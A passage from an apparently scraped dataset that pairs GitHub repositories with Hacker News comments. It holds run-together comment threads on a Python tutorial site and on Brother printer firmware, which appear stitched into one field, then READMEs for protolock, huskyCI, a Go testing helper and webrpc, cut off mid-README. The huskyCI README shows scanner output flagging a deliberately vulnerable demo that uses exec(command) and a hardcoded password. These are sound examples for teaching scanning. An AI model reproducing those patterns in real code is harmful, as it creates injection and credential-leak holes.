you can jump right in!One minor annoyance for me was that the animation for a correct answer - the exploding confetti - was a bit over the top. Like \"OK, yeah, chill out, all I did was get the answer right to an easy question\". I just find it too much to see that every time, but maybe that's just me.This is awesome, would love to see this for other languages as well. As for Python, can you add some walkthroughs for leetcode style questions. It'll help tons of us!This is great! Thanks for making it free and open source. \nIs there anything similar for TypeScript or JavaScript?This looks really good, going through the first couple of tasks it seems well considered.I'm introducing my 8yo daughter to programming at the moment, she is beginning to play around with Scratch. I'm keeping my eye out some something closer to proper coding though. I think this may be a little too far at the moment, but I may try her out on it with me sitting next to her and see how she gets on!Is there any way for users to construct their own multiple stage tutorials? (It looks like we can do single questions)Currently you have the console output, have you considered having a canvas/bitmap output that could be targeted with the various Python drawing and image manipulation apis?Incredibly generous of you to make it open source!The only downside is theres multiple ways to reach the same outcome, and unless you program it exactly what you're looking for it gives a false negative that the solution isn't correctThis is great. Would love to see this in Spanish. I\u2019m a fluent speaker but have never talked about code in Spanish, however I\u2019d be up to the challenge of helping translateThis, and other recommendations in this thread, are marvelous. I'm hopefully going to start volunteering at my kids' school teaching coding to ~10-12 year olds, and this will be a great tool for anyone who needs something more challenging.I would love to see something like this but for c++. I'm going to teach my kids programming but I want to go in this order c++ -> java, javascript/typescript, python -> rust, go -> perl, bashI\u2019ve just gotten started with Python, so this is perfect timing. Thank you!Thanks for sharing! This is really cool. I maintain my own learn-to-program site, so I have a sense of how much work this is.One interactive component that we use heavily that might interest you for futurecoder is what we call an interactive walkthrough: https://www.learncs.online/best#interactive-walkthroughs. It's like a video but preserving the interactive nature of a playground. Students really like them, and enjoy the opportunity to hear multiple explanations for the same concept when they're stuck. (We're working on popping this out for external use, and have a library in the works that you may be able to integrate with a bit of work.)I have no idea what your educational background is, but if you ever want a stable position that supports your educational innovation, consider applying for a teaching faculty job: https://go.cs.illinois.edu/teaching-faculty-hiring. (Currently our openings require a Masters degree.) We need more creators in computer science education.This is great! I am about to start datacamp, but I will also play with this one too.[flagged]i've tried few python learning apps half an year a go an oh boy... this one is 100x better and free?!?! \nniceThis looks great. I like how it's designed for self-paced instruction rather than classroom instruction. I noticed it doesn't appear to support multi-line input. Is that planned?BTW, to monetize this, you might create module-specific tutorials (like Pandas, Pygame, etc.) and implement a \"pay what you want\" system where $10 or more buys 5 modules.Looks great, will be recommending this in the futuse!I'll have to take a look. I really like exercism.org but I'm always looking for new ways to learn.I've got a Brother laser printer that's probably old enough to vote now. It's impressive that it's lasted this long, but the whole business model of printing is so rotten I still wonder how much I want it around when the toners have run completely dry. On top of the installation being a mess.I've seen that companies like Brother make dedicated shipping label printers, and I guess that's what I realistically would use my printer for the most.Brother's clearly doing horrible stuff, but printers also seem like a terrible business model when you ship products that live forever without maintenance beyond refilling the paper tray and toner.If only the e-ink display technology weren't encumbered by so many patents, maybe that's what we'd be reading most things on now instead.Yes, we all rage about this. K-cups, razors. Wait for the next decade: e-vehicle chargers, rocket booster packs (must be approved mixtures!). It never ends, not for this generation, or the next.So, just picking an open publishing article:Playing Super Mario 64 increases hippocampal grey matter in older adultshttps://journals.plos.org/plosone/article?id=10.1371/journal...Unfortunately, I don't have the strength, and I just want a different way.Aw and I thought brother was one of the good ones.The FTC seems to have got off their ass recently, so maybe it'd be worth it to file consumer protection complaints about shitty printer company behavior. I'm sure HN alone could fill their mailbox to bursting.Oh, this is bad. Brother has always, like for DECADES, been the non-shitty option.Had ipv6 before anyone else.Good Linux support, even for the scanners on their MFCs.Agnostic about third-party toner.This new firmware demolishes twenty years of goodwill.I was just looking at a new printer, and likely to replace my old Brother B&W MFC and Samsung color laser, with a new Brother color laser MFC, but it looks like I'll see how long I can string the old ones along.Gods I hope this is just a fluke but reading OP and some comments it seems that it is not. :(In any case, first thing I always do when I install a printer is to give it one exact static local IP because I made a firewall rule that blocks all outgoing WAN traffic from that IP. I lost faith in all my periphery to not sing behind my back and took things in my own hands.My Brother MFC works amazingly well and I will not think as a programmer in this case; I'll be a normal human who says \"no need to update it if it works\" and leave it at that.So far zero complains and I am happy with my device. And with these news I am even happier that I am paranoid and make sure my device doesn't get a firmware update.This is disappointing.I had been recommending Brother printers exactly because they did not pull shenanigans like this, their windows drivers were pretty light weight, and their Linux support is very good.Is anyone working on a OSS printer, like 3D printers? Buy an existing printer and then rip out + re-wire it's controller?Wanting to update the firmwareIf you weren't ever wary of updates, this should be a strong lesson. The updates are not for your benefit anymore; the companies just want to have you on a leash where they hold the other end.\"Don't fix it if it ain't broke.\"and then just purposefully print like garbageIn other words, they're maliciously spreading FUD that 3rd-party consumables will result in lower print quality, and then making that a self-fulfilling prophecy. That should be illegal if it isn't already.This is why I've never voluntarily owned a printer. Well, never actually owned one at all. My father got a bit frustrated that I didn't have a home printer and gifted one to my wife. It was used a couple of times.If I have something I need to print, I print it at work or at the library. Happens less than once a year. I don't need my own printer.Last time I had to print something it was so I could turn it in as an attachment to an application with a government agency. I flatly refuse to work with dead trees wherever possible.I have nothing but bad things to say about Brother. I will never buy another one.Last purchase was a $350 multifunction color laser printer that stopped turning on. I was just over the one year warranty and no support from Brother and their authorized service centers want to put me on a commercial support plan. I bought it for my wife, a teacher, because the school copiers were always broken or unavailable.HP makes shitty printers but they will actually help you get something replaced in my experience.I've been fighting brother printers for decades at this point. From taping over the clear hole plug to rewinding the spring cog. I feel like the only thing they can defeat me is probably NFC but I'm not sure if that would be worth it cost wise for them.I thought that was well known. In EU printers cannot be sold \"inked locked\". They do lock themselves as soon as they have an opportunity to update their firmware. My Brother never had Internet access. I configured it with the Internet gateway unplugged and assigned it a static address to which I forbid Internet access. It is now running on compatible color cartridges. For black I stay on OEM ink.It is funny that my venerable HP I had previously stopped working soon after I started using compatible ink. Since it was several years old, I was wanted to spare on ink. A gear broke soon after. Repaired the gear and something else broke. I did not do the second repair. Of course that could be a simple co\u00efncidence, I'll never know.BTW I would not recommend Brother either. It is very picky about paper. Have to use good quality 90g or more exclusively.I have an epson eco-tank printer. I buy 3rd party bottles of ink once every 2-3 years. The upfront cost of the printer (multifunction model ET-4550) was high in 2015 ($500) but I've spent maybe $60-70 in ink to print (as of this morning) 19,536 pages (13,954 in color, 5,582 in B/W).I can't see a good reason to keep buying printers that are locked into proprietary cartridges or toners.Aw man, my trustworthy Brothers HL-5470DW Brothers laser jet is taking a licking and still printing after 10 years.Here is to another 10 years \u2026 before I buy another used laser jet that hasn\u2019t been stupidly John Deere\u2019d.Remember that for some printers there are two parts, you need to change the ink and after some changes also the \"cylinder\". In any case I had seen a similar poor quality results in the brand. Can't recommend it.Ok... so if I need a printer, that won't fuck me with stuff like this, what should I buy now? Except HP of course, and now BrotherYeah I'm struggling. Last 15 years I bought \u00a350 multifunction brother or canon printers with separate ink cartridges and fake ink for a \u00a31 a cartridge. Wore the heads out in about five years, repeat. Now they seem to have disappeared, all the cheap canons have combined colour ink cartridges not separate. A colour laser multifunction is expensive and may have pricey toner too. People here seem to like the Epson Ecotanks but the reviews say they struggle on anything but thin paper. The canons megatank look a bit better but still \u00a3200 for a fairly basically built printer. You really need wifi for airprint as its not clear that OSX will have much usb printer support in future. Which leaves you paying \u00a3250 for something like a G650 megatank Canon. I partly blame the home printer market shrinking due to everyone going paperless but suddenly being faced with paying more for a printer than I did for my desktop PC is irritating. (I did suggest a basic laser but everyone said nooo we need colour and copying).Is there a printer that isn't a proprietary ink dispensing jail?I'm with current knowledge and tech it should be possible to print your own printer?Why hasn\u2019t the printer industry not been disrupted by a company that isn\u2019t hell-bent on fucking over their customers?Hmm, I have a new Brother color laser printer standing here with two batches of non-brother (I refuse to say non-genuine) toner. Kind of wonder how that will go when my printer included toner runs out\u2026My pretty old DCP-L2540DW has a new firmware update:06/16/2022 Main: V / Sub: 1.06\nImprovement to help with the performance of the machine.I think I'll pass.I wonder if this is an actual crime = vandalising your printer. It is not the inferiority of the ink = make prints bad consequentially, they are taking command and making it act against your best interest.\nGotta be class action in there...It's like if Catbert moved to Evil Printing Solutions from Evil Human Resources.We need laws to prevent such malicious practices. Currently most if not all printer vendors sell printers at loss hoping to claw it back by sell consumables at extremely high prices. Given such background, vendors have more than enough motivation to undermine 3rd party consumables if not totally lock them out.An alternative viewpoint is that this business model is good for consumers, or a least differently neutral.If printer companies try to make their money on the printer sale, then it's very difficult for folks who only need to print a little now and again, and they might not be able to afford a very good printer. By moving to a consumption-based revenue model, now they can let everyone have a super-cheap printer (they are MUCH cheaper than decades ago, despite inflation), and then the people who use the printer more (get more value from it) pay more, and those who don't pay less.This seems reasonable, even though I also don't like hardware that bricks itself if I don't use as directed.Buy an EPSON. Apart from the fact they have separate ink cartridges for each colour, they also don't act like satan.https://www.mimeo.com/blog/destroying-office-printer/I would recommend people who are looking for not only printers, but most kinds of equipment (except for cases where new stuff is unambiguously better than old stuff, but this is rare) to buy used professional/industrial hardware instead of new consumer equipment. And if this is difficult try to look for old consumer hardware still in good shape. These are often of much better quality and also it is much less wasteful to something used than new.Professional equipment is usually in another league than consumer stuff when it comes to quality and reliability and also usually has very low resale value so you can get it for quite cheap. Personally I just picked up an old Sharp color laser printer for about 90$. This is a great machine that prints 2 sided A3 (very hard to find for laser printers) and with toners that should last about 10000 pages which is way better than anything you can buy as a consumer. The only backside is that it is quite big and heavy.Old consumer equipment that is in good shape is often a good deal with the main reasoning being that something that has lasted for a long time has a higher probability of continuing to last a long time compared to something new where it is hard to say how long it will last.Oh noWow, if this comment is to be believed, the quality of Brother printers has seriously gone downhill:https://www.reddit.com/r/printers/comments/s9b2eg/brother_mf...Incredible.I'm old enough to remember buying a mouse and having to install the driver that came with the mouse on a floppy disk. Once the mouse market agreed to a single interface standard (and again when USB mice appeared) the world got simpler. Any computer you could buy would just work with whatever mouse you happened to plug into it. You only needed a custom driver if your mouse had lots of extra buttons that no-one really needed.I'm a little surprised that the same thing didn't happen to printers. I could imagine around 2005, Microsoft including a generic printer driver with Windows XP. This way, you could plug in any printer and it would just work, as long as the printer implemented that generic printing protocol, even if it were alongside their own printer interface.Plug in printer. Windows detects device with generic printer interface. User prints document. Document comes out. User happy.Oh sure, the printer would come with a CD that includes software that enables the \"special features\" of the printer. Digital cameras did this too. (Rule #1 of buying a digital camera: Throw away the CD that comes in the box. Break the CD just in case you're tempted that something on CD might fix some trivial issue you're having.)At the same time, I'm not surprised that never happened. Those \"special features\", like shouting at you for buying the wrong ink, are just way too important to not have installed on people's computers.I've got a HL series color laser that I'm otherwise happy with. The firmware version is reported as 1.34. I guess I just have to take care to never upgrade that, and make a mental note never to buy another Brother product again?I predict the next device to go all bonkers with subscriptions and pay-per-use etc is cars.There would be a day when you have to spend $$$ to use air conditioning even though the entire hardware for that is in there.Disappointing. I am on my second Brother HL series laser printer. They've been great for me. Fast cheap printing and readily available 3rd party toner and drums.The first one I got it in 2010 and I purchased a 2nd in 2018 when the first stopped working. I would have kept using the original if it were possible to repair it. I would have also paid more than the $80 sticker priceAnother data point: I have been using a Brother inkjet multifunctional printer with high-capacity ink cartridges for ~five years now, it has no problems with third party ink, and it has worked perfectly from day one. My home office is apparently quite challenging for an inkjet printer, because it's located directly under the roof, so temperatures can get quite high in the summer, which the Epson printer I had before couldn't handle - it constantly had white lines in the printouts. No problem with the Brother.Bummer, I\u2019ve been a fan of Brother in the past. Owned two monochrome laser printers that have been great over 10 years of service with not a single paper jam.I can't wrap my head around how the printer market has turned into this absolutely dispicable, foul state that it is in right now.Decades of innovation that have been invested, not to make a better product, but mostly on how to extract more and more money from their victims, I mean \"customers\".I would like to own a printer again, but for printing something like once a month, I just can't financially justify spending several hundred bucks on a device that might, at the whim of the manufacturer, decide that the way I'm using it is not okay anymore, is probably designed to break after two years, requires me to sign up for a subscription service for ink, or whatever BS else the decision makers in this space come up with.Ugh. This is bad news. I've used Brother B&W lasers at home for the past 20 years, and they've been great. (I'm 5 years into my second one, because when the rollers wore out on my first one, 15 years in, I decided I'd rather have the iOS printing features they offered on their newer models instead of sourcing new rollers and taking it apart to change them.)Between their BrScript and their no-BS networking, they were the last I know of to work with no fuss with all the machines I own. On everything other than the iDevices, it's nothing more than a PPD install.I hope this isn't accurate.Thanks for heads up I was considering of upgrading to a Brother model that scans to PDF. Now I won\u2019t.That is unfortunate, I have had good luck with the 2 I have owned over the last fifteen years. They had a toner window that I\u2019d have to cover with tape to avoid toner low messages, but that is the extent of their games.Well that's just awful. I own 2 Brother printers because I thought their management wasn't garbage like HP. I don't know what I'll do when one breaks.You have to get an antique laser like an Apple IInt. New stuff is garbage.Almost 40 years ago RMS, the guy people love to hate, created the Free/Libre software movement and a proprietary printer firmware was one of his motivations.For 40 years this guy has been talking about the perils of proprietary software and people gave a shit to him.Today people not only strongly defend proprietary software, but they think he is a moron, and even free/libre software activists think proprietary firmwares are okay as long their hardware works as expected.Of course this is okay until their hardware stops to work as intended and you are locked out because the proprietary firmware, which usually is what happens.Time for an open hardware printer manufacturer? Or more lobbying for right-to-third-party-ink protection (including not making the quality worse) ?At the same time many other brands are improving. I've seen ink tank based printers from HP and Epson lately, probably more brands. It's a shame Brother is going this way though because they were so great for a long timeWould you be interested in getting a laser printer? I have a Brother and it works very well. It doesn't come with a huge toner cartridge but I'm still on the starter and it's been more than 5 years. Honestly I don't print super often, but it's a nice to have thing. The build quality is also good. It's a bit of a pain to set up, but once done it \"just works\".You may want to add \"Tell HN\" to your title.My Canon MFC742cdw has been complaining about me using the original toner far beyond its \"useful lifetime\". I lost count, but it must have been at least 200 pages ago and it's still printing just fine. Kind of sad that we need to learn to put up with this kind of dark patterns.Buy a KyoceraPerhaps it's time to ban printers and printing. Let's make it all digital!Soon they'll have a hidden 5G Internet connection that sends all printed material to the manufacturer, who will then sell the data to advertisers and the state.Are there still any new printers (postscript, laser) that are reasonable? Black and white printing is sufficient.This is very disappointing to hear. Brother were the one bright spot in the printer industry and I'm so much happier since I switched my business to using a Brother colour laser.They've probably recruited one of the bright spark MBA execs that \"revolutionised\"[1] the other manufactures with this kind of rent seeking crap.You know that deal, trade a firm's reputation for quality for a short term boost in profits, bank the bonus and move to another job before the chickens come home to roost. :(1. By revolutionised I of course mean ruined.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "nilslice/protolock", "link": "https://github.com/nilslice/protolock", "tags": ["protocol-buffers", "protoc", "protobuf", "tools", "productivity", "cli", "golang", "proto-files"], "stars": 516, "description": "Protocol Buffer companion tool. Track your .proto files and prevent changes to messages and services which impact API compatibility.", "lang": "Go", "repo_lang": "", "readme": "# protolock\n\nTrack your .proto files and prevent changes to messages and services which impact API compatibility.\n\n[![CircleCI](https://circleci.com/gh/nilslice/protolock/tree/master.svg?style=svg)](https://circleci.com/gh/nilslice/protolock/tree/master)\n[![GoDoc](https://img.shields.io/badge/godoc-reference-blue.svg?style=flat)](https://godoc.org/github.com/nilslice/protolock)\n\n## Why\n\nEver _accidentally_ break your API compatibility while you're busy fixing problems? You may have forgotten to reserve the field number of a message or you re-ordered fields after removing a property. Maybe a new team member was not familiar with the backward-compatibility of Protocol Buffers and made an easy mistake.\n\n`protolock` attempts to help prevent this from happening.\n\n## Overview\n\n1. **Initialize** your repository: \n\n $ protolock init\n # creates a `proto.lock` file\n\n3. **Add changes** to .proto messages or services, verify no breaking changes made: \n\n $ protolock status\n CONFLICT: \"Channel\" is missing ID: 108, which had been reserved [path/to/file.proto]\n CONFLICT: \"Channel\" is missing ID: 109, which had been reserved [path/to/file.proto]\n\n2. **Commit** a new state of your .protos (rewrites `proto.lock` if no warnings): \n\n $ protolock commit\n # optionally provide --force flag to disregard warnings\n\n4. **Integrate** into your protobuf compilation step: \n\n $ protolock status && protoc -I ...\n\nIn all, prevent yourself from compiling your protobufs and generating code if breaking changes have been made.\n\n**Recommended:** commit the output `proto.lock` file into your version control system\n\n## Install\nIf you have [Go](https://golang.org) installed, you can install `protolock` by running:\n\n- Go >= 1.17:\n\n\t```bash\n\tgo install github.com/nilslice/protolock/cmd/protolock@latest\n\t```\n\n- Go < 1.17:\n\n\t```bash\n\tgo get github.com/nilslice/protolock/cmd/protolock\n\t```\n\nOtherwise, download a pre-built binary for Windows, macOS, or Linux from the [latest release](https://github.com/nilslice/protolock/releases/latest) page.\n\n## Usage\n```\nprotolock [options]\n\nCommands:\n\t-h, --help, help\tdisplay the usage information for protolock\n\tinit\t\t\tinitialize a proto.lock file from current tree\n\tstatus\t\t\tcheck for breaking changes and report conflicts\n\tcommit\t\t\trewrite proto.lock file with current tree if no conflicts (--force to override)\n\nOptions:\n\t--strict [true]\t\tenable strict mode and enforce all built-in rules\n\t--debug\t[false]\t\tenable debug mode and output debug messages\n\t--ignore \t\tcomma-separated list of filepaths to ignore\n\t--force [false]\t\tforces commit to rewrite proto.lock file and disregards warnings\n\t--plugins \t\tcomma-separated list of executable protolock plugin names\n\t--lockdir [.]\t\tdirectory of proto.lock file\n\t--protoroot [.]\t\troot of directory tree containing proto files\n\t--uptodate [false]\tenforce that proto.lock file is up-to-date with proto files\n```\n\n## Related Projects & Users\n- [Apache Ozone](https://github.com/apache/ozone)\n- [Fanatics](https://github.com/fanatics)\n- [Salesforce](https://github.com/salesforce/proto-backwards-compat-maven-plugin)\n- [Istio](https://github.com/istio/api)\n- [Lyft](https://github.com/lyft)\n- [Envoy](https://github.com/envoyproxy)\n- [Netflix](https://github.com/Netflix)\n- [VMware](https://github.com/vmware/hamlet)\n- [Storj](https://github.com/storj/storj)\n- [Token.io](https://github.com/tokenio/merchant-proxy)\n- [Openbase](https://github.com/openbase/type)\n- [Zeebee](https://github.com/zeebe-io/zeebe)\n\n## Rules Enforced\n\n#### No Using Reserved Fields\nCompares the current vs. updated Protolock definitions and will return a list of \nwarnings if any message's previously reserved fields or IDs are now being used \nas part of the same message.\n\n#### No Removing Reserved Fields\nCompares the current vs. updated Protolock definitions and will return a list of \nwarnings if any reserved field has been removed. \n\n**Note:** This rule is not enforced when strict mode is disabled. \n\n\n#### No Changing Field IDs\nCompares the current vs. updated Protolock definitions and will return a list of \nwarnings if any field ID number has been changed.\n\n\n#### No Changing Field Types\nCompares the current vs. updated Protolock definitions and will return a list of \nwarnings if any field type has been changed.\n\n\n#### No Changing Field Names\nCompares the current vs. updated Protolock definitions and will return a list of \nwarnings if any message's previous fields have been renamed. \n\n**Note:** This rule is not enforced when strict mode is disabled. \n\n#### No Removing Fields Without Reserve\nCompares the current vs. updated Protolock definitions and will return a list of \nwarnings if any field has been removed without a corresponding reservation of \nthat field name or ID.\n\n#### No Removing RPCs\nCompares the current vs. updated Protolock definitions and will return a list of \nwarnings if any RPCs provided by a Service have been removed. \n\n**Note:** This rule is not enforced when strict mode is disabled. \n\n#### No Changing RPC Signature\nCompares the current vs. updated Protolock definitions and will return a list of \nwarnings if any RPC signature has been changed while using the same name.\n\n---\n\n## Docker \n\n```sh\ndocker pull nilslice/protolock:latest\ndocker run -v $(pwd):/protolock -w /protolock nilslice/protolock init\n```\n\n---\n\n## Plugins\nThe default rules enforced by `protolock` may not cover everything you want to \ndo. If you have custom checks you'd like run on your .proto files, create a \nplugin, and have `protolock` run it and report your warnings. Read the wiki to \nlearn more about [creating and using plugins](https://github.com/nilslice/protolock/wiki/Plugins).\n\n---\n\n## Contributing\nPlease feel free to make pull requests with better support for various rules, \noptimized code and overall tests. Filing an issue when you encounter a bug or\nany unexpected behavior is very much appreciated. \n\nFor current issues, see: [open issues](https://github.com/nilslice/protolock/issues)\n\n---\n\n## Acknowledgement\n\nThank you to Ernest Micklei for his work on the excellent parser heavily relied upon by this tool and many more: [https://github.com/emicklei/proto](https://github.com/emicklei/proto)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "globocom/huskyCI", "link": "https://github.com/globocom/huskyCI", "tags": ["vulnerabilities", "continuous-integration", "golang", "python", "javascript", "ruby-on-rails", "static-analysis", "security-automation", "gosec", "brakeman", "bandit", "safety", "npm-audit", "yarn-audit", "gitlab-ci", "security-tools", "hacktoberfest", "hacktoberfest2022"], "stars": 517, "description": "Performing security tests inside your CI", "lang": "Go", "repo_lang": "", "readme": "

\n \n \n

\n\n

\n \n \n\n\n

\n\n## Introduction\n\nhuskyCI is an open source tool that orchestrates security tests and centralizes all results into a database for further analysis and metrics. It can perform static security analysis in Python ([Bandit][Bandit] and [Safety][Safety]), Ruby ([Brakeman][Brakeman]), JavaScript ([Npm Audit][NpmAudit] and [Yarn Audit][YarnAudit]), Golang ([Gosec][Gosec]), Java ([SpotBugs][SpotBugs] plus [Find Sec Bugs][FindSec]), and HCL ([TFSec][TFSec]). It can also audit repositories for secrets like AWS Secret Keys, Private SSH Keys, and many others using [GitLeaks][Gitleaks].\n\n## How does it work?\n\nDevelopers can set up a new stage into their CI pipelines to check for vulnerabilities:\n\n

\n\nIf security issues are found in the code, the severity, the confidence, the file, the line, and many more useful information can be shown, as exemplified:\n\n```\n[HUSKYCI][*] poc-python-bandit -> https://github.com/globocom/huskyCI.git\n[HUSKYCI][*] huskyCI analysis started! yDS9tb9mdt4QnnyvOBp3eVAXE1nWpTRQ\n\n[HUSKYCI][!] Title: Use of exec detected.\n[HUSKYCI][!] Language: Python\n[HUSKYCI][!] Tool: Bandit\n[HUSKYCI][!] Severity: MEDIUM\n[HUSKYCI][!] Confidence: HIGH\n[HUSKYCI][!] Details: Use of exec detected.\n[HUSKYCI][!] File: ./main.py\n[HUSKYCI][!] Line: 7\n[HUSKYCI][!] Code:\n6\n7 exec(command)\n8\n\n[HUSKYCI][!] Title: Possible hardcoded password: 'password123!'\n[HUSKYCI][!] Language: Python\n[HUSKYCI][!] Tool: Bandit\n[HUSKYCI][!] Severity: LOW\n[HUSKYCI][!] Confidence: MEDIUM\n[HUSKYCI][!] Details: Possible hardcoded password: 'password123!'\n[HUSKYCI][!] File: ./main.py\n[HUSKYCI][!] Line: 1\n[HUSKYCI][!] Code:\n1 secret = 'password123!'\n2\n3 password = 'thisisnotapassword' #nohusky\n4\n\n[HUSKYCI][SUMMARY] Python -> huskyci/bandit:1.6.2\n[HUSKYCI][SUMMARY] High: 0\n[HUSKYCI][SUMMARY] Medium: 1\n[HUSKYCI][SUMMARY] Low: 1\n[HUSKYCI][SUMMARY] NoSecHusky: 1\n\n[HUSKYCI][SUMMARY] Total\n[HUSKYCI][SUMMARY] High: 0\n[HUSKYCI][SUMMARY] Medium: 1\n[HUSKYCI][SUMMARY] Low: 1\n[HUSKYCI][SUMMARY] NoSecHusky: 1\n\n[HUSKYCI][*] The following securityTests were executed and no blocking vulnerabilities were found:\n[HUSKYCI][*] [huskyci/gitleaks:2.1.0]\n[HUSKYCI][*] Some HIGH/MEDIUM issues were found in these securityTests:\n[HUSKYCI][*] [huskyci/bandit:1.6.2]\nERROR: Job failed: exit code 190\n```\n\n## Getting Started\n\nYou can try huskyCI by setting up a local environment using Docker Compose following [this guide](https://huskyci.opensource.globo.com/docs/development/set-up-environment).\n\n## Documentation\n\nAll guides and the full documentation can be found in the [official documentation page](https://huskyci.opensource.globo.com/docs/quickstart/overview).\n\n## Contributing\n\nRead our [contributing guide](https://github.com/globocom/huskyCI/blob/master/CONTRIBUTING.md) to learn about our development process, how to propose bugfixes and improvements, and how to build and test your changes to huskyCI.\n\n## Communication\n\nWe have a few channels for contact, feel free to reach out to us at:\n\n- [GitHub Issues](https://github.com/globocom/huskyCI/issues)\n- [Gitter](https://gitter.im/globocom/huskyCI)\n- [Twitter](https://twitter.com/huskyCI)\n\n## Contributors\n\nThis project exists thanks to all the [contributors]((https://github.com/globocom/huskyCI/graphs/contributors)). You rock! \u2764\ufe0f\ud83d\ude80\n\n## License\n\nhuskyCI is licensed under the [BSD 3-Clause \"New\" or \"Revised\" License](https://github.com/globocom/huskyCI/blob/master/LICENSE.md).\n\n[Bandit]: https://github.com/PyCQA/bandit\n[Safety]: https://github.com/pyupio/safety\n[Brakeman]: https://github.com/presidentbeef/brakeman\n[Gosec]: https://github.com/securego/gosec\n[NpmAudit]: https://docs.npmjs.com/cli/audit\n[YarnAudit]: https://yarnpkg.com/lang/en/docs/cli/audit/\n[Gitleaks]: https://github.com/zricethezav/gitleaks\n[SpotBugs]: https://spotbugs.github.io\n[FindSec]: https://find-sec-bugs.github.io\n[TFSec]: https://github.com/liamg/tfsec\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "benbjohnson/testing", "link": "https://github.com/benbjohnson/testing", "tags": [], "stars": 516, "description": "A small collection of functions for Go testing.", "lang": "Go", "repo_lang": "", "readme": "Testing Functions for Go\n========================\n\nBelow is a small collection of testing functions for Go. You don't need to import this as a dependency. Just copy these to your project as needed.\n\nNo, seriously. They're tiny functions. Just copy them.\n\n\n```go\nimport (\n\t\"fmt\"\n\t\"path/filepath\"\n\t\"runtime\"\n\t\"reflect\"\n\t\"testing\"\n)\n\n// assert fails the test if the condition is false.\nfunc assert(tb testing.TB, condition bool, msg string, v ...interface{}) {\n\tif !condition {\n\t\t_, file, line, _ := runtime.Caller(1)\n\t\tfmt.Printf(\"\\033[31m%s:%d: \"+msg+\"\\033[39m\\n\\n\", append([]interface{}{filepath.Base(file), line}, v...)...)\n\t\ttb.FailNow()\n\t}\n}\n\n// ok fails the test if an err is not nil.\nfunc ok(tb testing.TB, err error) {\n\tif err != nil {\n\t\t_, file, line, _ := runtime.Caller(1)\n\t\tfmt.Printf(\"\\033[31m%s:%d: unexpected error: %s\\033[39m\\n\\n\", filepath.Base(file), line, err.Error())\n\t\ttb.FailNow()\n\t}\n}\n\n// equals fails the test if exp is not equal to act.\nfunc equals(tb testing.TB, exp, act interface{}) {\n\tif !reflect.DeepEqual(exp, act) {\n\t\t_, file, line, _ := runtime.Caller(1)\n\t\tfmt.Printf(\"\\033[31m%s:%d:\\n\\n\\texp: %#v\\n\\n\\tgot: %#v\\033[39m\\n\\n\", filepath.Base(file), line, exp, act)\n\t\ttb.FailNow()\n\t}\n}\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "webrpc/webrpc", "link": "https://github.com/webrpc/webrpc", "tags": ["webrpc", "json", "webapps", "code-generation", "golang", "typescript", "rpc", "api", "rest"], "stars": 515, "description": "webrpc is a schema-driven approach to writing backend services for modern Web apps and networks", "lang": "Go", "repo_lang": "", "readme": "\"webrpc\"\n\nwebrpc is a schema-driven approach to writing backend servers for the Web. Write your server's\nAPI interface in a schema format of [RIDL](./_examples/golang-basics/example.ridl) or [JSON](./_examples/golang-basics/example.webrpc.json),\nand then run `webrpc-gen` to generate the networking source code for your server and client apps. From the schema,\n`webrpc-gen` will generate application base class types/interfaces, JSON encoders, and networking code. In doing\nso, it's able to generate fully functioning and typed client libraries to communicate with your server. Enjoy\nstrongly-typed Web services and never having to write an API client library again.\n\nUnder the hood, webrpc is a Web service meta-protocol, schema and code-generator tool for\nsimplifying the development of backend services for modern Web applications.\n\n- [Getting started](#getting-started)\n- [Code generators](#code-generators)\n- [Quick example](#quick-example)\n - [Example apps](#example-apps)\n- [Why](#why)\n- [Design / architecture](#design--architecture)\n- [Schema](#schema)\n- [Development](#development)\n - [Building from source](#building-from-source)\n - [Writing your own code-generator](#writing-your-own-code-generator)\n- [Authors](#authors)\n- [Credits](#credits)\n- [License](#license)\n\n# Getting started\n\n1. Install [webrpc-gen](https://github.com/webrpc/webrpc/releases)\n2. Write+design a [webrpc schema file](./_examples/golang-basics/example.ridl) for your Web service\n3. Run the code-generator to create your server interface and client, ie.\n - `webrpc-gen -schema=example.ridl -target=golang -pkg=service -server -client -out=./service/proto.gen.go`\n - `webrpc-gen -schema=example.ridl -target=typescript -client -out=./web/client.ts`\n4. Implement the handlers for your server -- of course, it can't guess the server logic :)\n\nanother option is to copy the [hello-webrpc](./_examples/hello-webrpc) example, and adapt for your own webapp and server.\n\n# Code generators\n\n| Generator | Description | Schema | Client | Server |\n|--------------------------------------------------------|-----------------------|--------|--------|--------|\n| [golang](https://github.com/webrpc/gen-golang) | Go 1.16+ | v1 | \u2705 | \u2705 |\n| [typescript](https://github.com/webrpc/gen-typescript) | TypeScript | v1 | \u2705 | \u2705 |\n| [javascript](https://github.com/webrpc/gen-javascript) | JavaScript (ES6) | v1 | \u2705 | \u2705 |\n| [openapi](https://github.com/webrpc/gen-openapi) | OpenAPI 3.x (Swagger) | v1 | \u2705 [*](https://github.com/swagger-api/swagger-codegen#overview) | \u2705 [*](https://github.com/swagger-api/swagger-codegen#overview) |\n\n..contribute more! [webrpc generators](./gen/) are just Go templates (similar to [Hugo](https://gohugo.io/templates/) or [Helm](https://helm.sh/docs/chart_best_practices/templates/)).\n\n# Quick example\n\nHere is an example webrpc schema in RIDL format (a new documentation-like format introduced by webrpc)\n\n```\nwebrpc = v1\n\nname = your-app\nversion = v0.1.0\n\nstruct User\n - id: uint64\n - username: string\n - createdAt?: timestamp\n\nstruct UsersQueryFilter\n - page?: uint32\n - name?: string\n - location?: string\n\nservice ExampleService\n - Ping()\n - Status() => (status: bool)\n - GetUserByID(userID: uint64) => (user: User)\n - IsOnline(user: User) => (online: bool)\n - ListUsers(q?: UsersQueryFilter) => (page: uint32, users: []User)\n```\n\nGenerate webrpc Go server+client code:\n\n```\nwebrpc-gen -schema=example.ridl -target=golang -pkg=main -server -client -out=./example.gen.go\n```\n\nand see the generated `./example.gen.go` file of types, server and client in Go. This is essentially\nhow the [golang-basics](./_examples/golang-basics) example was built.\n\n\n## Example apps\n\n| Example | Description |\n|------------------------------------------------|-----------------------------------------------|\n| [hello-webrpc](./_examples/hello-webrpc) | Go server <=> Javascript webapp |\n| [hello-webrpc-ts](./_examples/hello-webrpc-ts) | Go server <=> Typescript webapp |\n| 